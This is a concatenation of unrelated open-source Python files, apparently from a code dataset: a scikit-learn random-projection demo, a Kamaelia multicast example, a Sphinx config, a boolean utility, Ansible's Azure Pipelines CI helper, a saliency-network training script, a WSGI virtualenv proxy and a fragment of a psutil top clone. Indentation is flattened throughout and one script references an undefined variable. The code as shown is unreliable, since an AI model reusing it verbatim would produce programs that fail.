newsgroups dataset, pass the --twenty-newsgroups command line argument to this
script.
For each value of ``n_components``, we plot:
- 2D distribution of sample pairs with pairwise distances in original
and projected spaces as x and y axis respectively.
- 1D histogram of the ratio of those distances (projected / original).
We can see that for low values of ``n_components`` the distribution is wide
with many distorted pairs and a skewed distribution (due to the hard
limit of zero ratio on the left as distances are always positives)
while for larger values of n_components the distortion is controlled
and the distances are well preserved by the random projection.
Remarks
=======
According to the JL lemma, projecting 500 samples without too much distortion
will require at least several thousands dimensions, irrespective of the
number of features of the original dataset.
Hence using random projections on the digits dataset which only has 64 features
in the input space does not make sense: it does not allow for dimensionality
reduction in this case.
On the twenty newsgroups on the other hand the dimensionality can be decreased
from 56436 down to 10000 while reasonably preserving pairwise distances.
"""
print(__doc__)
import sys
from time import time
import numpy as np
import matplotlib.pyplot as plt
from sklearn.random_projection import johnson_lindenstrauss_min_dim
from sklearn.random_projection import SparseRandomProjection
from sklearn.datasets import fetch_20newsgroups_vectorized
from sklearn.datasets import load_digits
from sklearn.metrics.pairwise import euclidean_distances
# Part 1: plot the theoretical dependency between n_components_min and
# n_samples
# range of admissible distortions
eps_range = np.linspace(0.1, 0.99, 5)
colors = plt.cm.Blues(np.linspace(0.3, 1.0, len(eps_range)))
# range of number of samples (observation) to embed
n_samples_range = np.logspace(1, 9, 9)
plt.figure()
for eps, color in zip(eps_range, colors):
min_n_components = johnson_lindenstrauss_min_dim(n_samples_range, eps=eps)
plt.loglog(n_samples_range, min_n_components, color=color)
plt.legend(["eps = %0.1f" % eps for eps in eps_range], loc="lower right")
plt.xlabel("Number of observations to eps-embed")
plt.ylabel("Minimum number of dimensions")
plt.title("Johnson-Lindenstrauss bounds:\nn_samples vs n_components")
# range of admissible distortions
eps_range = np.linspace(0.01, 0.99, 100)
# range of number of samples (observation) to embed
n_samples_range = np.logspace(2, 6, 5)
colors = plt.cm.Blues(np.linspace(0.3, 1.0, len(n_samples_range)))
plt.figure()
for n_samples, color in zip(n_samples_range, colors):
min_n_components = johnson_lindenstrauss_min_dim(n_samples, eps=eps_range)
plt.semilogy(eps_range, min_n_components, color=color)
plt.legend(["n_samples = %d" % n for n in n_samples_range], loc="upper right")
plt.xlabel("Distortion eps")
plt.ylabel("Minimum number of dimensions")
plt.title("Johnson-Lindenstrauss bounds:\nn_components vs eps")
# Part 2: perform sparse random projection of some digits images which are
# quite low dimensional and dense or documents of the 20 newsgroups dataset
# which is both high dimensional and sparse
if '--twenty-newsgroups' in sys.argv:
# Need an internet connection hence not enabled by default
data = fetch_20newsgroups_vectorized().data[:500]
else:
data = load_digits().data[:500]
n_samples, n_features = data.shape
print("Embedding %d samples with dim %d using various random projections"
% (n_samples, n_features))
n_components_range = np.array([300, 1000, 10000])
dists = euclidean_distances(data, squared=True).ravel()
# select only non-identical samples pairs
nonzero = dists != 0
dists = dists[nonzero]
for n_components in n_components_range:
t0 = time()
rp = SparseRandomProjection(n_components=n_components)
projected_data = rp.fit_transform(data)
print("Projected %d samples from %d to %d in %0.3fs"
% (n_samples, n_features, n_components, time() - t0))
if hasattr(rp, 'components_'):
n_bytes = rp.components_.data.nbytes
n_bytes += rp.components_.indices.nbytes
print("Random matrix with size: %0.3fMB" % (n_bytes / 1e6))
projected_dists = euclidean_distances(
projected_data, squared=True).ravel()[nonzero]
plt.figure()
plt.hexbin(dists, projected_dists, gridsize=100, cmap=plt.cm.PuBu)
plt.xlabel("Pairwise squared distances in original space")
plt.ylabel("Pairwise squared distances in projected space")
plt.title("Pairwise distances distribution for n_components=%d" %
n_components)
cb = plt.colorbar()
cb.set_label('Sample pairs counts')
rates = projected_dists / dists
print("Mean distances rate: %0.2f (%0.2f)"
% (np.mean(rates), np.std(rates)))
plt.figure()
plt.hist(rates, bins=50, normed=True, range=(0., 2.))
plt.xlabel("Squared distances rate: projected / original")
plt.ylabel("Distribution of samples pairs")
plt.title("Histogram of pairwise distance rates for n_components=%d" %
n_components)
# TODO: compute the expected value of eps and add them to the previous plot
# as vertical lines / region
plt.show()
| bsd-3-clause |
bbc/kamaelia | Sketches/MPS/BugReports/FixTests/Kamaelia/Examples/Multicast/BasicSystems/MulticastStreamingSystem.py | 6 | 1623 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Basic acceptance test harness for the Multicast_sender and receiver
# components.
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from Kamaelia.File.ReadFileAdaptor import ReadFileAdaptor
from Kamaelia.Codec.Vorbis import VorbisDecode, AOAudioPlaybackAdaptor
from Kamaelia.Internet.Multicast_transceiver import Multicast_transceiver
from Kamaelia.Chassis.Pipeline import Pipeline
from Kamaelia.Util.Detuple import SimpleDetupler
file_to_stream = "../../SupportingMediaFiles/KDE_Startup_2.ogg"
# Server
Pipeline(
ReadFileAdaptor(file_to_stream, readmode="bitrate", bitrate=400000, chunkrate=50),
Multicast_transceiver("0.0.0.0", 0, "224.168.2.9", 1600),
).activate()
# Client
Pipeline(
Multicast_transceiver("0.0.0.0", 1600, "224.168.2.9", 0),
SimpleDetupler(1),
VorbisDecode(),
AOAudioPlaybackAdaptor(),
).run()
| apache-2.0 |
kevenli/scrapydd | docs/conf.py | 1 | 10111 | # -*- coding: utf-8 -*-
#
# scrapydd documentation build configuration file, created by
# sphinx-quickstart on Fri Oct 07 20:40:31 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'scrapydd'
copyright = u'2020, kevenli'
author = u'kevenli'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.7.5'
# The full version, including alpha/beta/rc tags.
release = u'0.7.5'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = u'scrapydd v0.1'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'scrapydddoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'scrapydd.tex', u'scrapydd Documentation',
u'kevenli', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# It false, will not define \strong, \code, itleref, \crossref ... but only
# \sphinxstrong, ..., \sphinxtitleref, ... To help avoid clash with user added
# packages.
#
# latex_keep_old_macro_names = True
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'scrapydd', u'scrapydd Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'scrapydd', u'scrapydd Documentation',
author, 'scrapydd', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
| apache-2.0 |
netvigator/myPyPacks | DbApi/Boolean.py | 2 | 3440 | #!/usr/bin/pythonTest
# -*- coding: utf-8 -*-
#
# DbApi functions Boolean
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# The GNU General Public License is available from:
# The Free Software Foundation, Inc.
# 51 Franklin Street, Fifth Floor
# Boston MA 02110-1301 USA
#
# http://www.gnu.org/licenses/gpl.html
#
# Copyright 2004-2016 Rick Graves
#
setBooleanTrue = frozenset( ( 't', 'true', 'y', 'yes', '1' ) )
setBooleanFalse = frozenset( ( 'f', 'false', 'n', 'no', '0' ) )
from Utils.Both2n3 import setNumberTypes
tBooleansSQL = ( 'FALSE', 'TRUE' )
def _isNumber( u ): return type( u ) in setNumberTypes
def getBooleanInteger( uValue, bDebug = 1 ):
#
from six import print_ as print3
#
from String.Get import getContentOutOfQuotes
#
if _isNumber( uValue ):
#
iValue = int( bool( uValue ) )
#
else:
#
iValue = None
#
uValue = getContentOutOfQuotes( uValue ).lower()
#
if uValue in setBooleanTrue: iValue = 1
elif uValue in setBooleanFalse: iValue = 0
else:
if bDebug:
print3( uValue )
raise TypeError
#
#
return iValue
def getBoolFactory( sSystemSQL ):
#
if sSystemSQL == 'sqlite':
#
getBool = getBooleanInteger
#
else:
#
def getBool( uValue ):
#
return tBooleansSQL[ getBooleanInteger( uValue ) ]
#
return getBool
if __name__ == "__main__":
#
from Iter.AllVers import lMap, tMap
from Utils.Result import sayTestResult
#
lProblems = []
#
tBoolStrings = ( 8, 't', 'true', 'y', 'yes', '1', 0, 'f', 'false', 'n', 'no', '0' )
#
lBools = tMap( getBooleanInteger, tBoolStrings )
#
if lBools != ( 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0 ):
#
lProblems.append( 'getBooleanInteger() valid values' )
#
#
try:
#
getBooleanInteger( 'xyz', bDebug = 0 )
#
except TypeError:
#
pass
#
else:
#
# we are here only if a TypeError exception was not raised!
#
lProblems.append( 'getBooleanInteger() invalid value' )
#
#
dResults = {}
#
for sSystemSQL in ( 'sqlite', 'postgresql' ):
#
getBool = getBoolFactory( sSystemSQL )
#
dResults[ sSystemSQL ] = lMap( getBool, tBoolStrings )
#
#
if dResults[ 'sqlite' ] != [1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0]:
#
lProblems.append( 'getBoolFactory() for sqlite' )
#
#
if dResults[ 'postgresql' ] != \
[ 'TRUE', 'TRUE', 'TRUE', 'TRUE', 'TRUE', 'TRUE',
'FALSE', 'FALSE', 'FALSE', 'FALSE', 'FALSE', 'FALSE' ]:
#
lProblems.append( 'getBoolFactory() for SQL compatibles' )
#
#
sayTestResult( lProblems ) | gpl-2.0 |
computersalat/ansible | test/lib/ansible_test/_internal/ci/azp.py | 8 | 9846 | """Support code for working with Azure Pipelines."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import re
import tempfile
import uuid
from .. import types as t
from ..encoding import (
to_bytes,
)
from ..config import (
CommonConfig,
TestConfig,
)
from ..git import (
Git,
)
from ..http import (
HttpClient,
urlencode,
)
from ..util import (
display,
MissingEnvironmentVariable,
)
from . import (
AuthContext,
ChangeDetectionNotSupported,
CIProvider,
CryptographyAuthHelper,
)
CODE = 'azp'
class AzurePipelines(CIProvider):
"""CI provider implementation for Azure Pipelines."""
def __init__(self):
self.auth = AzurePipelinesAuthHelper()
@staticmethod
def is_supported(): # type: () -> bool
"""Return True if this provider is supported in the current running environment."""
return os.environ.get('SYSTEM_COLLECTIONURI', '').startswith('https://dev.azure.com/')
@property
def code(self): # type: () -> str
"""Return a unique code representing this provider."""
return CODE
@property
def name(self): # type: () -> str
"""Return descriptive name for this provider."""
return 'Azure Pipelines'
def generate_resource_prefix(self): # type: () -> str
"""Return a resource prefix specific to this CI provider."""
try:
prefix = 'azp-%s-%s-%s' % (
os.environ['BUILD_BUILDID'],
os.environ['SYSTEM_JOBATTEMPT'],
os.environ['SYSTEM_JOBIDENTIFIER'],
)
except KeyError as ex:
raise MissingEnvironmentVariable(name=ex.args[0])
prefix = re.sub(r'[^a-zA-Z0-9]+', '-', prefix)
return prefix
def get_base_branch(self): # type: () -> str
"""Return the base branch or an empty string."""
base_branch = os.environ.get('SYSTEM_PULLREQUEST_TARGETBRANCH') or os.environ.get('BUILD_SOURCEBRANCHNAME')
if base_branch:
base_branch = 'origin/%s' % base_branch
return base_branch or ''
def detect_changes(self, args): # type: (TestConfig) -> t.Optional[t.List[str]]
"""Initialize change detection."""
result = AzurePipelinesChanges(args)
if result.is_pr:
job_type = 'pull request'
else:
job_type = 'merge commit'
display.info('Processing %s for branch %s commit %s' % (job_type, result.branch, result.commit))
if not args.metadata.changes:
args.metadata.populate_changes(result.diff)
if result.paths is None:
# There are several likely causes of this:
# - First run on a new branch.
# - Too many pull requests passed since the last merge run passed.
display.warning('No successful commit found. All tests will be executed.')
return result.paths
def supports_core_ci_auth(self, context): # type: (AuthContext) -> bool
"""Return True if Ansible Core CI is supported."""
return True
def prepare_core_ci_auth(self, context): # type: (AuthContext) -> t.Dict[str, t.Any]
"""Return authentication details for Ansible Core CI."""
try:
request = dict(
org_name=os.environ['SYSTEM_COLLECTIONURI'].strip('/').split('/')[-1],
project_name=os.environ['SYSTEM_TEAMPROJECT'],
build_id=int(os.environ['BUILD_BUILDID']),
task_id=str(uuid.UUID(os.environ['SYSTEM_TASKINSTANCEID'])),
)
except KeyError as ex:
raise MissingEnvironmentVariable(name=ex.args[0])
self.auth.sign_request(request)
auth = dict(
azp=request,
)
return auth
def get_git_details(self, args): # type: (CommonConfig) -> t.Optional[t.Dict[str, t.Any]]
"""Return details about git in the current environment."""
changes = AzurePipelinesChanges(args)
details = dict(
base_commit=changes.base_commit,
commit=changes.commit,
)
return details
class AzurePipelinesAuthHelper(CryptographyAuthHelper):
"""
Authentication helper for Azure Pipelines.
Based on cryptography since it is provided by the default Azure Pipelines environment.
"""
def publish_public_key(self, public_key_pem): # type: (str) -> None
"""Publish the given public key."""
# the temporary file cannot be deleted because we do not know when the agent has processed it
with tempfile.NamedTemporaryFile(prefix='public-key-', suffix='.pem', delete=False) as public_key_file:
public_key_file.write(to_bytes(public_key_pem))
public_key_file.flush()
# make the agent aware of the public key by declaring it as an attachment
vso_add_attachment('ansible-core-ci', 'public-key.pem', public_key_file.name)
class AzurePipelinesChanges:
"""Change information for an Azure Pipelines build."""
def __init__(self, args): # type: (CommonConfig) -> None
self.args = args
self.git = Git()
try:
self.org_uri = os.environ['SYSTEM_COLLECTIONURI'] # ex: https://dev.azure.com/{org}/
self.project = os.environ['SYSTEM_TEAMPROJECT']
self.repo_type = os.environ['BUILD_REPOSITORY_PROVIDER'] # ex: GitHub
self.source_branch = os.environ['BUILD_SOURCEBRANCH']
self.source_branch_name = os.environ['BUILD_SOURCEBRANCHNAME']
self.pr_branch_name = os.environ.get('SYSTEM_PULLREQUEST_TARGETBRANCH')
except KeyError as ex:
raise MissingEnvironmentVariable(name=ex.args[0])
if self.source_branch.startswith('refs/tags/'):
raise ChangeDetectionNotSupported('Change detection is not supported for tags.')
self.org = self.org_uri.strip('/').split('/')[-1]
self.is_pr = self.pr_branch_name is not None
if self.is_pr:
# HEAD is a merge commit of the PR branch into the target branch
# HEAD^1 is HEAD of the target branch (first parent of merge commit)
# HEAD^2 is HEAD of the PR branch (second parent of merge commit)
# see: https://git-scm.com/docs/gitrevisions
self.branch = self.pr_branch_name
self.base_commit = 'HEAD^1'
self.commit = 'HEAD^2'
else:
commits = self.get_successful_merge_run_commits()
self.branch = self.source_branch_name
self.base_commit = self.get_last_successful_commit(commits)
self.commit = 'HEAD'
self.commit = self.git.run_git(['rev-parse', self.commit]).strip()
if self.base_commit:
self.base_commit = self.git.run_git(['rev-parse', self.base_commit]).strip()
# <rev1>...<rev2>
# Include commits that are reachable from <rev2> but exclude those that are reachable from <rev1>.
# see: https://git-scm.com/docs/gitrevisions
dot_range = '%s..%s' % (self.base_commit, self.commit)
self.paths = sorted(self.git.get_diff_names([dot_range]))
self.diff = self.git.get_diff([dot_range])
else:
self.paths = None # act as though change detection not enabled, do not filter targets
self.diff = []
def get_successful_merge_run_commits(self): # type: () -> t.Set[str]
"""Return a set of recent successsful merge commits from Azure Pipelines."""
parameters = dict(
maxBuildsPerDefinition=100, # max 5000
queryOrder='queueTimeDescending', # assumes under normal circumstances that later queued jobs are for later commits
resultFilter='succeeded',
reasonFilter='batchedCI', # may miss some non-PR reasons, the alternative is to filter the list after receiving it
repositoryType=self.repo_type,
repositoryId='%s/%s' % (self.org, self.project),
)
url = '%s%s/build/builds?%s' % (self.org_uri, self.project, urlencode(parameters))
http = HttpClient(self.args)
response = http.get(url)
# noinspection PyBroadException
try:
result = response.json()
except Exception: # pylint: disable=broad-except
# most likely due to a private project, which returns an HTTP 203 response with HTML
display.warning('Unable to find project. Cannot determine changes. All tests will be executed.')
return set()
commits = set(build['sourceVersion'] for build in result['value'])
return commits
def get_last_successful_commit(self, commits): # type: (t.Set[str]) -> t.Optional[str]
"""Return the last successful commit from git history that is found in the given commit list, or None."""
commit_history = self.git.get_rev_list(max_count=100)
ordered_successful_commits = [commit for commit in commit_history if commit in commits]
last_successful_commit = ordered_successful_commits[0] if ordered_successful_commits else None
return last_successful_commit
def vso_add_attachment(file_type, file_name, path): # type: (str, str, str) -> None
"""Upload and attach a file to the current timeline record."""
vso('task.addattachment', dict(type=file_type, name=file_name), path)
def vso(name, data, message): # type: (str, t.Dict[str, str], str) -> None
"""
Write a logging command for the Azure Pipelines agent to process.
See: https://docs.microsoft.com/en-us/azure/devops/pipelines/scripts/logging-commands?view=azure-devops&tabs=bash
"""
display.info('##vso[%s %s]%s' % (name, ';'.join('='.join((key, value)) for key, value in data.items()), message))
| gpl-3.0 |
imatge-upc/saliency-2016-cvpr | shallow/train.py | 2 | 3064 | # add to kfkd.py
from lasagne import layers
from lasagne.updates import nesterov_momentum
from nolearn.lasagne import NeuralNet,BatchIterator
import os
import numpy as np
from sklearn.utils import shuffle
import cPickle as pickle
import matplotlib.pyplot as plt
import Image
import ImageOps
from scipy import misc
import scipy.io
import theano
def load():
f = file('data_Salicon_T.cPickle', 'rb')
loaded_obj = pickle.load(f)
f.close()
X, y = loaded_obj
return X, y
def float32(k):
return np.cast['float32'](k)
class AdjustVariable(object):
def __init__(self, name, start=0.03, stop=0.001):
self.name = name
self.start, self.stop = start, stop
self.ls = None
def __call__(self, nn, train_history):
if self.ls is None:
self.ls = np.linspace(self.start, self.stop, nn.max_epochs)
epoch = train_history[-1]['epoch']
new_value = float32(self.ls[epoch - 1])
getattr(nn, self.name).set_value(new_value)
class FlipBatchIterator(BatchIterator):
def transform(self, Xb, yb):
Xb, yb = super(FlipBatchIterator, self).transform(Xb, yb)
# Flip half of the images in this batch at random:
bs = Xb.shape[0]
indices = np.random.choice(bs, bs / 2, replace=False)
Xb[indices] = Xb[indices, :, :, ::-1]
tmp = yb[indices].reshape(bs/2,1,48,48)
mirror = tmp[ :,:,:, ::-1]
yb[indices] = mirror.reshape(bs/2,48*48)
return Xb, yb
net2 = NeuralNet(
layers=[
('input', layers.InputLayer),
('conv1', layers.Conv2DLayer),
('pool1', layers.MaxPool2DLayer),
('conv2', layers.Conv2DLayer),
('pool2', layers.MaxPool2DLayer),
('conv3', layers.Conv2DLayer),
('pool3', layers.MaxPool2DLayer),
('hidden4', layers.DenseLayer),
('maxout6',layers.FeaturePoolLayer),
('output', layers.DenseLayer),
],
input_shape=(None, 3, 96, 96),
conv1_num_filters=32, conv1_filter_size=(5, 5), pool1_pool_size=(2, 2),
conv2_num_filters=64, conv2_filter_size=(3, 3), pool2_pool_size=(2, 2),
conv3_num_filters=64, conv3_filter_size=(3, 3), pool3_pool_size=(2, 2),
hidden4_num_units=48*48*2,
maxout6_pool_size=2,output_num_units=48*48,output_nonlinearity=None,
update_learning_rate=theano.shared(float32(0.05)),
update_momentum=theano.shared(float32(0.9)),
regression=True,
on_epoch_finished=[
AdjustVariable('update_learning_rate', start=0.05, stop=0.0001),
AdjustVariable('update_momentum', start=0.9, stop=0.999),
],
batch_iterator_train=FlipBatchIterator(batch_size=128),
max_epochs=1200,
verbose=1,
)
X, y = load()
print("X.shape == {}; X.min == {:.3f}; X.max == {:.3f}".format(
X.shape, X.min(), X.max()))
print("y.shape == {}; y.min == {:.3f}; y.max == {:.3f}".format(
y.shape, y.min(), y.max()))
X = X.astype(np.float32)
y = y.astype(np.float32)
net.fit(X, y)
with open('JuntingNet_SALICON.pickle', 'wb') as f:
pickle.dump(net2, f, -1) | mit |
SUSE/azure-sdk-for-python | examples/AzureResourceViewer/ptvs_virtualenv_proxy.py | 58 | 4204 | # ############################################################################
#
# Copyright (c) Microsoft Corporation.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# vspython@microsoft.com. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
# ###########################################################################
import datetime
import os
import sys
import traceback
if sys.version_info[0] == 3:
def to_str(value):
return value.decode(sys.getfilesystemencoding())
def execfile(path, global_dict):
"""Execute a file"""
with open(path, 'r') as f:
code = f.read()
code = code.replace('\r\n', '\n') + '\n'
exec(code, global_dict)
else:
def to_str(value):
return value.encode(sys.getfilesystemencoding())
def log(txt):
"""Logs fatal errors to a log file if WSGI_LOG env var is defined"""
log_file = os.environ.get('WSGI_LOG')
if log_file:
f = open(log_file, 'a+')
try:
f.write('%s: %s' % (datetime.datetime.now(), txt))
finally:
f.close()
ptvsd_secret = os.getenv('WSGI_PTVSD_SECRET')
if ptvsd_secret:
log('Enabling ptvsd ...\n')
try:
import ptvsd
try:
ptvsd.enable_attach(ptvsd_secret)
log('ptvsd enabled.\n')
except:
log('ptvsd.enable_attach failed\n')
except ImportError:
log('error importing ptvsd.\n');
def get_wsgi_handler(handler_name):
if not handler_name:
raise Exception('WSGI_ALT_VIRTUALENV_HANDLER env var must be set')
if not isinstance(handler_name, str):
handler_name = to_str(handler_name)
module_name, _, callable_name = handler_name.rpartition('.')
should_call = callable_name.endswith('()')
callable_name = callable_name[:-2] if should_call else callable_name
name_list = [(callable_name, should_call)]
handler = None
last_tb = ''
while module_name:
try:
handler = __import__(module_name, fromlist=[name_list[0][0]])
last_tb = ''
for name, should_call in name_list:
handler = getattr(handler, name)
if should_call:
handler = handler()
break
except ImportError:
module_name, _, callable_name = module_name.rpartition('.')
should_call = callable_name.endswith('()')
callable_name = callable_name[:-2] if should_call else callable_name
name_list.insert(0, (callable_name, should_call))
handler = None
last_tb = ': ' + traceback.format_exc()
if handler is None:
raise ValueError('"%s" could not be imported%s' % (handler_name, last_tb))
return handler
activate_this = os.getenv('WSGI_ALT_VIRTUALENV_ACTIVATE_THIS')
if not activate_this:
raise Exception('WSGI_ALT_VIRTUALENV_ACTIVATE_THIS is not set')
def get_virtualenv_handler():
log('Activating virtualenv with %s\n' % activate_this)
execfile(activate_this, dict(__file__=activate_this))
log('Getting handler %s\n' % os.getenv('WSGI_ALT_VIRTUALENV_HANDLER'))
handler = get_wsgi_handler(os.getenv('WSGI_ALT_VIRTUALENV_HANDLER'))
log('Got handler: %r\n' % handler)
return handler
def get_venv_handler():
log('Activating venv with executable at %s\n' % activate_this)
import site
sys.executable = activate_this
old_sys_path, sys.path = sys.path, []
site.main()
sys.path.insert(0, '')
for item in old_sys_path:
if item not in sys.path:
sys.path.append(item)
log('Getting handler %s\n' % os.getenv('WSGI_ALT_VIRTUALENV_HANDLER'))
handler = get_wsgi_handler(os.getenv('WSGI_ALT_VIRTUALENV_HANDLER'))
log('Got handler: %r\n' % handler)
return handler
| mit |
fmacias64/Dato-Core | src/unity/python_deps/psutil/examples/top.py | 44 | 7382 | #!/usr/bin/env python
# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
A clone of top / htop.
Author: Giampaolo Rodola' <g.rodola@gmail.com>
$ python examples/top.py
CPU0 [| ] 4.9%
CPU1 [||| ] 7.8%
CPU2 [ ] 2.0%
CPU3 [||||| ] 13.9%
Mem [||||||||||||||||||| ] 49.8% 4920M/9888M
Swap [ ] 0.0% 0M/0M
Processes: 287 (running=1 sleeping=286)
Load average: 0.34 0.54 0.46 Uptime: 3 days, 10:16:37
PID USER NI VIRT RES CPU% MEM% TIME+ NAME
------------------------------------------------------------
989 giampaol 0 66M 12M 7.4 0.1 0:00.61 python
2083 root 0 506M 159M 6.5 1.6 0:29.26 Xorg
